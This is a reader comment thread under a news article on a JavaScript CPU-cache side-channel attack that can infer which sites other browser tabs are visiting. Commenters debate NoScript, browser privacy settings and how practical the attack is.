back to article Talk about a cache flow problem: This JavaScript can snoop on other browser tabs to work out what you're visiting

Computer science boffins have demonstrated a side-channel attack technique that bypasses recently-introduced privacy defenses, and makes even the Tor browser subject to tracking. The result: it is possible for malicious JavaScript in one web browser tab to spy on other open tabs, and work out which websites you're visiting. …

Page:

  1. Pascal Monett Silver badge
    FAIL

    "it is possible for malicious JavaScript in one web browser tab to spy on other open tabs"

    Not with NoScript it isn't.

    1. sabroni Silver badge

      Re: Not with NoScript it isn't.

      Must of us use NoScript to selectively run scripts from some domains and not from others, otherwise we'd just turn JS off for the whole browser and be done.

      So it depends which domain hosts the malicious JS.

      1. Pascal Monett Silver badge

        I'm supposing that those of us who do run NoScript will be trusting domains that do not serve as hosts for malicious domains.

        1. Anonymous Coward
          Anonymous Coward

          Ah Pascal, you are an innocent ... keep hoping that it will all work out OK in the end ... it might.

          1. Fruit and Nutcase Silver badge
            Joke

            @AC, Pascal Monett

            Ah Pascal

            Did you mean Oh! Pascal!

        2. bombastic bob Silver badge
          Devil

          actually, I run noscript, ONLY allow a very small number of domains, and if a web site is persistent and for some reason I _must_ use it, I do the following:

          su - differentuser

          export DISPLAY=localhost:0.0

          firefox &

          then the firefox settings for 'differentuser' are:

          a) dump all history on exit

          b) allow script anyway

          c) don't keep login information in the browser's settings either

          then paste the URL into the "other user" browser, and run as usual. expect longer delays [loading all of that scripty crap and no cache]. When done, exit the browser, kinda like flushing the toilet when you're done with "whatever".

          (NOTE: you'll need to allow TCP for X11 and NOT be running windows for this to work; windows may alternately let you use 'run as user' with firefox for a similar effect, but I haven't tried it, and I always recommend to NOT run a web browser and surf the web in windows, ESPECIALLY not a user with admin privs)

          secondary point: to allow TCP on an X server these days, you may need to set up your system for "multi-user" (i.e. don't boot into the GUI 'gdm' etc. and use 'startx') and have a '~/.xserverrc' file that looks like this:

          exec Xorg -listen tcp

          then make sure you block port 6000 at the firewall, so nobody else tries to connect to you. Also will need to execute "xhost +localhost" so that the 'export DISPLAY=' trick will work

          1. Cavehomme_

            No Script = No Internet

            “su - differentuser

            export DISPLAY=localhost:0”

            Yep, you’ll get far with Jo Public with that workaround. Easier still, break their internet experience for them by using NoScript with no exclusions.

            Everyone who doesn’t frig around with IT, ie the 99%, have no option but to rely upon their security software to do the job.

      2. JohnFen

        Re: Not with NoScript it isn't.

        The way I use NoScript is that I disallow all Javascript by default. Then, if needed, I'll selectively allow specific scripts. No site gets blanket permission to run any and all scripts they want.

        1. Anonymous Coward
          Anonymous Coward

          Re: Not with NoScript it isn't.

          But the script in question can simply be attached to or be a part of one of those "needed to run the site" scripts. Hard to defeat "piggyback" scripts without breaking sites you frequent. Unless and until there's a mandate to make websites as simple as possible (over and against the objections of John Q. Public), this will continue. Indeed, JavaScript can simply be one means. The big big reveal is that it's possible to identify your action through broad things accessible to the average user (CPU and cache utilization) in a way that can nail down the browser perhaps even while other things are going on (meaning it can filter noise). Perhaps the next step will be to find a way to snoop that can't be shut off; then it's decision time for those who can't afford or logistically use more than one computer.

          1. ElReg!comments!Pierre

            Re: Not with NoScript it isn't. @AC

            As I understand it, the authors dismiss the "other things [...] going on" because the browser uses a large proportion of resources, and the noise is "filtered" because "deep learning" (which would in most cases eliminate basic, predictable system activity). One of the problems, in my view, is that this "broad" approach is unlikely to work if there is significant unpredictable system activity going on at the same time (say, you're retreiving your mails via ClawsMail while loading the page).

            Also, even if 'net browsing is the only thing going on, I wonder how well the technique works when tab number increases. I'm guessing "not well at all". My 2 primary uses for tabbed browsing are comics binge-reading, and wide-scope documentation. In both cases I often have 10+ tabs loading at the same time, good luck with that, cache-lurkers. (Well of course I don't allow JS to begin with because I like resource frugality -and not because I have shitty slow 'puters, as some may malignantly suggest- but that's beside the point)

            1. jelabarre59

              Re: Not with NoScript it isn't. @AC

              I wonder how well the technique works when tab number increases. I'm guessing "not well at all". My 2 primary uses for tabbed browsing are comics binge-reading, and wide-scope documentation. In both cases I often have 10+ tabs loading at the same time, good luck with that, cache-lurkers

              Yeah, I should probably do "secure" browsing while I'm visiting TVTropes. I'll have 15 or 20 tabs open by then (at minimum).

              1. ElReg!comments!Pierre
                Pint

                Re: Not with NoScript it isn't. @AC

                The brand is "security by WTFizzatshitRuserious"

  2. macjules
    IT Angle

    "Computer science boffins"

    You make it sound as though there are scientists in a laboratory wearing white coats and peering at oscilloscopes á la 1970's Open University programmes.

    1. sabroni Silver badge
      Happy

      Re: "Computer science boffins"

      New here?

    2. Giovani Tapini

      Re: "Computer science boffins"

      You mean that is not the case?

      1. big_D Silver badge

        Re: "Computer science boffins"

        No they were kipper ties, flannel shirts and flared corduroy trousers, When it is cold, tweed jackets with leather patches on the elbows.

        A pipe and a perm are also usually a prerequisite, the latter at least among the more hirsute, otherwise a brushover is recommended.

        1. big_D Silver badge

          Re: "Computer science boffins"

          they wear... :-S

      2. bombastic bob Silver badge
        Trollface

        Re: "Computer science boffins"

        oops I forgot to hook my o-scope up to my computer...

    3. Anonymous Coward
      Anonymous Coward

      Re: "Computer science boffins"

      It also sounds as if they regularly boff their always beautiful lab assistants. And there are at least 2 things wrong in that sentence.

  3. Dom De Vitto

    Ermmmm, been this way forever?

    This is literally a cute way to do something you could always do.

    Load a object, compare load/compile/execute times to determine if it's was downloaded or already downloaded.

    Bucketing the cache per "requester site" would resolve this, but also impact performance.

    The real impact here is when you consider iterating though a graph of social media to find the particular persons profile using basic set theory & finally iteration over the short list of people who've seen the recent posts from DUP Supporters, UK Parliament News and LGBT weekly.

    1. diodesign (Written by Reg staff) Silver badge

      Re: Ermmmm, been this way forever?

      This is using the CPU cache to fingerprint pages from their memory accesses. It's a new technique to spy on browser tabs, which has been done in the past.

      C.

      1. This post has been deleted by its author

  4. Anonymous Coward
    Anonymous Coward

    about:config

    "Mozilla said it would disable or reduce the precision of time sources in its Firefox browser."

    privacy.resistFingerprinting.reduceTimerPrecision.microseconds

    privacy.resistFingerprinting.reduceTimerPrecision.jitter

    privacy.reduceTimerPrecision

    1. Anonymous Coward
      Anonymous Coward

      Re: about:config

      And:

      privacy.resistFingerprinting must be set to TRUE.

      1. veti Silver badge

        Re: about:config

        Well, problem sorted then. I don't see how you could be more intuitive than that.

        </sarcasm>

  5. Pen-y-gors

    It should only take 10 minutes to negotiate a fix for this

    Well, possibly a little more.

    But shirley there are a number of defences and browser fixes possible?

    It would have an efficiency hit but could the browser do a bit of random cache grabbing all the time? So the pattern is unpredictable? There are enough delays in loading and rendering a page these days that there is ample spare time to play around.

    And does this attack work cross browser, so could you defend by using Chrome for the stuff you don't care about ('cos Google is snooping on everything anyway) and then say, Firefox in private mode for the banking site?

    1. ElReg!comments!Pierre

      Re: It should only take 10 minutes to negotiate a fix for this

      They're fingerprinting the processor cache, so the script would "detect" a page loading in another browser (whether it could identify it rather depends on how the browsers load pages and how the fingerprint database was constructed).

      The aim for this technique would not be to construct a map of every website you visit, as their "open world" setup shows. Rather, it would seek to determine if you are visiting a "sensitive" website, and as such are overdue for a friendly chat in the back of an unmarked van.

  6. tiggity Silver badge

    JS - just for a change

    ". Disabling JavaScript completely will kill off the attack, but also kill off a lot of websites, which rely on JS functionality to work"

    problem is most sites which "rely on JS", use it for functionality that could be achieved without JS - either eye candy bells and whistles (plenty of which could be done via CSS) or JS calls to dynamically get content (instead of all being served from server) which basically puts more workload on user browser (and their bandwidth) and less workload on server.

    JS is too often the lazy option.

    Instead of Chrome et al being focused on non https warnings, would be good if they warned about JS use (given Google are a big JS abuse miscreant, I'm not holding my breath)

    1. Bod

      Re: JS - just for a change

      Let's go back to static pages where you have to keep clicking next page to scroll through thousands of items instead of dynamically loading them then.

      Back to Web 1.0

      1. Zolko Silver badge

        Re: JS - just for a change

        @Bod : "Let's go back to static pages [...] Back to Web 1.0"

        well, if you're using Tor, then it's for privacy reasons, so it is probably a very strange idea to browse with JS enabled AND have multiple tabs opened visiting different and sensitive sites. For example I use a different browser for banking than for regular reading, and I use the banking browser only for that, with JS enabled since they need it.

      2. JohnFen

        Re: JS - just for a change

        "Let's go back to static pages where you have to keep clicking next page to scroll through thousands of items instead of dynamically loading them then."

        For this particular example, I really, really wish that sites would go back to behaving that way. Dynamic loading is something that gets in my way on a daily basis.

      3. bombastic bob Silver badge
        Stop

        Re: JS - just for a change

        "Back to Web 1.0"

        preferable to the bandwidth wasting script intensive bell-whistle-new-shiny market-platform track-via-ads bright blue on blinding white 2D FLATTY "shit show" we're exposed to on a daily basis.

        yeah, been here a LONG time. You can make things look good without cat video ads playing in every corner of the page.

    2. Shadow Systems

      Re: JS - just for a change

      At Tiggity, I just turn off JS entirely. If a site refuses to load because of it, then I do a search for "cache: $URL" to get a plain text version of the page & read the content anyway. A site can whinge about cookie policies & JS requirements all they want, I'm not agreeing to (nor allowing) either "requirement". If I can access my (new! WOOHOO!) banks site without JS enabled then a simple news site can jolly-well cough up their content without it either.

      At Bod, you say returning to HTML 1.0 as if it were a BAD thing. Given how much shit everything newer keeps introducing into the mix with which site builders then use to fuck with us, I'd say pruning said bits out with a chainsaw & extreme prejudice is a GOOD thing. So what if you have to click next to get more content, at least then you don't have to worry if the JS they're using to serve up such pages is about to deliver a virus instead.

      I realize & accept that I'm a luddite in this regard, but then maybe my "luddite paranoia" has grounds given all the shit being flung at us in the hopes that some of it sticks. =-(

      1. bombastic bob Silver badge
        Pint

        Re: JS - just for a change

        "do a search for 'cache: $URL' to get a plain text version of the page & read the content anyway."

        see icon

    3. JohnFen

      Re: JS - just for a change

      "problem is most sites which "rely on JS", use it for functionality that could be achieved without JS"

      Yep. And well-designed sites will continue to work properly even if they can't run scripts in the browser -- they just drop the bells and whistles (which, half of the time, makes the web site faster and easier to use anyway).

      My standard practice is that if a site doesn't work properly without Javascript, then I just don't use the site. There are very, very few websites which are actually indispensable.

    4. bombastic bob Silver badge
      Devil

      Re: JS - just for a change

      "problem is most sites which "rely on JS", use it for functionality that could be achieved without JS"

      The WORST ones send back an error from nginx - some CDN out there uses javascript to load their pages, and when the load/redirect (via script) fails, you see that 'FORBIDDEN' error from nginx.

      It's a filter that KEEPS ME FROM USING THAT WEB SITE. I'll go elsewhere, and flame them every chance I can, for doing that. [if it's a web site rental, I'll ask the owner nicely to use a different service provider, with a nice easily understood explanation as to why]

      /me considers a javascript in some of my pages that loads the "you are an idiot" flash, infinite instances of it. So if script is OFF, you are fine. If you enable it, "you are an idiot, ha ha-ha ha ha ha ha ha ha ha haaa!" with a rapidly growing number of instances filling your screen. It'd also be an 'idiot detector' for people who still have flash player enabled.

    5. veti Silver badge

      Re: JS - just for a change

      JS is too often the lazy option.

      Well, yes. But saying why it gets used does not really get us any closer to preventing its misuse.

      Whatever the reason, the fact is it's very, very widely used, and you can't simply turn it off without breaking a (very) large part of the web we have now.

      It would be more helpful to identify the specific JS functions that are used in this attack, and how they could be rewritten or redacted entirely to suppress it.

      1. JohnFen

        Re: JS - just for a change

        "Whatever the reason, the fact is it's very, very widely used, and you can't simply turn it off without breaking a (very) large part of the web we have now."

        Fine by me -- that's what I've been doing for years anyway. Sites that are so poorly designed that they can't run without Javascript are sites that are so poorly designed that they don't deserve my attention.

        "It would be more helpful to identify the specific JS functions that are used in this attack, and how they could be rewritten or redacted entirely to suppress it."

        But that would only plug this one specific hole without addressing the underlying problem that scripts have entirely too much access to your browser and computer to be considered generally safe.

        1. Charles 9

          Re: JS - just for a change

          "Fine by me -- that's what I've been doing for years anyway. Sites that are so poorly designed that they can't run without Javascript are sites that are so poorly designed that they don't deserve my attention."

          Problem is, what if it's the ONLY way to access your money (because it's your bank, for which there are no local branches of ANY bank within a reasonable drive--and no, EVERY employer is forced to direct deposit for tax reasons--those who don't tend to get sniffed by la migra)?

    6. FlamingDeath Silver badge
      Boffin

      Re: JS - just for a change

      I have a policy, if some douchebag web developer cant be bothered to make a website at least partially functional without javascript and I am presented with a white page, I leave and go elsewhere.

      I recommend others do the same

  7. Steve Graham

    The "fingerprinting" depends on every browser requesting identical data from the site. If your ad-blocker and script-blocker stop your browser from requesting some of it, the fingerprint becomes blurry.

    1. Deckard_C

      Might that not be the reverse, stopping the ever changing ads will make the site more predictable. Provided they have fingerprinted the site with ads blocked as well.

    2. ElReg!comments!Pierre

      It also relies on connection speed, browser brand and version, websites staying the same over time -the attacker needs to build a fingerprint database-, and overall ressource consumption. As such, it might achieve 70% accuracy in a lab setup with a limited set of fixed pages, constant and known connection speed, known browser and no other system activity, but I can't see it working in the real world.

  8. Version 1.0 Silver badge

    Welcome to the 21st century

    No big surprise here - this is the way that the world works these days. No worries the bug can be fixed^H^H^H^H^H moved somewhere else.

  9. bazza Silver badge

    Practising Safe Hex

    Yet another reason why running random, unattributed, dunno-where-it-came-from, I'm-sure-it'll-be-OK-really code off the Internet is a bad idea.

    One day this is going to reach a point where it's indefensible for companies like Google to persist with Javascript as a technology. Many, including myself, think we're already there, and have been for quite some time...

    Interesting to think that the large tech comanies are effectively one major browser breach away from unrecoverable reputational damage. That's a risk that they cannot wholly control - people use their browsers for more than just accessing (for example) Google services, and those other sites are potentially able to attack Google's services security without Google being able to control or even detect that.

    Not that the old fashioned way was inherently secure - people got software nasties through dodgy shareware, USB sticks, all sorts of vectors. But at least with those you were knowingly installing that software, or plugging in that free USB stick, or connecting to that public network with file sharing enabled, etc. Nowadays just a little light web browsing to even perfectly standard websites can result in someone somewhere getting code running on your machine, and hijacking your data.

    1. vtcodger Silver badge

      Re: Practising Safe Hex

      One day this is going to reach a point where it's indefensible for companies like Google to persist with Javascript as a technology

      I truly hope you are right, since running arbitrary code provided by poorly controlled third parties is obviously a REALLY BAD idea from a security POV. But the fact that it's a bad idea doesn't seem to have much impact on Web Developers. (As an internet user, Web Developers are not my favorite people). There's also the fact that a lot of sites that deal with maps or text editing or such actually need scripting unless and until alternate approaches can be developed.

      My guess is that if things get bad enough, there will eventually, in the face of much protesting, be a ban on running third party scripts. I have my doubts that'll work well enough to provide us users with adequate security. And it will cause a lot of short term problems. But it would certainly be a step in the right direction.

      Time will tell.

      1. JohnFen

        Re: Practising Safe Hex

        "As an internet user, Web Developers are not my favorite people"

        You and me both. But I hold even more antipathy towards those awful "UX" people. Of course, there is a lot of overlap in the Venn diagram of those two groups.

    2. bombastic bob Silver badge
      Devil

      Re: Practising Safe Hex

      I've been calling it "Safe Surfing" for a while. It includes things like:

      a) don't use internet explorer or Edge or MS Outlook [aka virus outbreak]

      b) don't be logged in with admin credentials for e-mail or web surfing

      c) if possible, don't use windows to surf the web or read e-mail

      d) run noscript or its equivalent

      e) only (pre)view e-mail in plain text, NEVER with attachments inline

      f) always save attachments to disk, then open with "the application" (not double-click) by running the application FIRST and then using 'file open', and have SCRIPTING TURNED OFF when you do it.

      etc.

  10. Charlie Clark Silver badge

    Claims of spying are overblown

    We show that we can spy from one browser tab on another and even from one browser on other browsers running on the computer.

    Not really. The technique can detect which sites may have been visited with reasonable accuracy. That's enough for some degree of profiling but it's a long way from spying. And it relies on the really paranoid using multiple tabs and keeping the browsers open.

    If I was really paranoid I suspect I'd disable tabs and possilby even run each browser instance in a VM.

    1. JohnFen

      Re: Claims of spying are overblown

      "If I was really paranoid I suspect I'd disable tabs and possilby even run each browser instance in a VM"

      I guess that I'm half-paranoid. I am not really a user of tabs in the first place (not for security reasons, but because I find it better from a usability standpoint to run multiple instances of a browser rather than having a bunch of tabs in a single instance), but if I have to use a site that doesn't function without allowing Javascript, I always do that from inside a VM.

Page:

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like